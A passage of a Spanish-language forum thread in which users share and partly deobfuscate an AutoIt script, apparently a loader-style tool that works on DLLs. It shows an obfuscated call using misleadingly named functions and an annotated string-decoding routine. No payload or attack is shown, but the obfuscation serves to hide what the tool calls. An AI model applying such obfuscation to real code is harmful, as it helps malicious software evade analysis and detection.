LOCAL $ACALL=$ADMINISTRATIONROOTEXPLOITHOOKADMINISTRATIONHOOK(STRINGDEC("gisqrnanonrphwezrnlerrcpslnegz","4,-4,-1,-3,-13,-2,-46,-60,-65,-10,-6,-4"),STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4"),STRINGDEC("ejkuftmguocuyhwozahfcvigcwnibd","-30,-5,9,-37,12,-5,-10,-38,-17,-11,15,-16,-6,11"),STRINGDEC("wvyhizikrnukotjwuqbnvlyvoqlxdb","-15,-21,-11,-4,3,-21"),$HMODULE,$STYPE,$VNAME)
IF @ERROR OR NOT $ACALL[0]THEN RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(1,0,0)
RETURN $ACALL[0]
ENDFUNC
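; Decodes one of the script's obfuscated strings.  $PARAM is a comma-separated
; list of integer offsets; the i-th offset is added to the character code of
; the i-th character of $STRING (cycling back to the first character when
; the key is exhausted) and the result is ChrW of each sum, concatenated.
; Returns the decoded text.  Returns "" with @error = 1 when $STRING is
; empty; the original indexed an empty array in that case and aborted the
; script.  All working variables are now Local - the original assigned
; $COUNT, $RETURN, $CHAR and $COMPARE without declaring them, leaking them
; into global scope.
FUNC STRINGDEC($STRING,$PARAM)
LOCAL $AKEY=STRINGTOASCIIARRAY($STRING)
LOCAL $IKEYLEN=UBOUND($AKEY)
IF $IKEYLEN=0 THEN RETURN SETERROR(1,0,"")
; Flag 2 ($STR_NOCOUNT): 0-based array without the element count in [0].
LOCAL $AOFFSETS=STRINGSPLIT($PARAM,",",2)
LOCAL $SRESULT=""
LOCAL $IKEYPOS=0
FOR $I=0 TO UBOUND($AOFFSETS)-1
; Number() makes the string-to-integer conversion of each offset explicit.
$SRESULT&=CHRW(NUMBER($AOFFSETS[$I])+$AKEY[$IKEYPOS])
; Wrap around to the start of the key after its last character.
$IKEYPOS=MOD($IKEYPOS+1,$IKEYLEN)
NEXT
RETURN $SRESULT
ENDFUNC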
Las strings están ofuscadas, pero igualmente no debería afectar al funcionamiento del programa. Eso creo...
 #493181  por Scorpio
 05 Ene 2018, 01:54
Es tarde; mañana intentaré desofuscar para ver esto mejor. Si es lo que dices, bonito regalo traes.

EDIT: Aquí lo tenéis un poco más limpio; falta desofuscar las strings. Por lo que veo, creo que solo funciona con DLL (x32/x64) y no con ejecutables; aun así, aún no lo he probado, ando cansado... Otro día sigo. :drinking:

//Regards.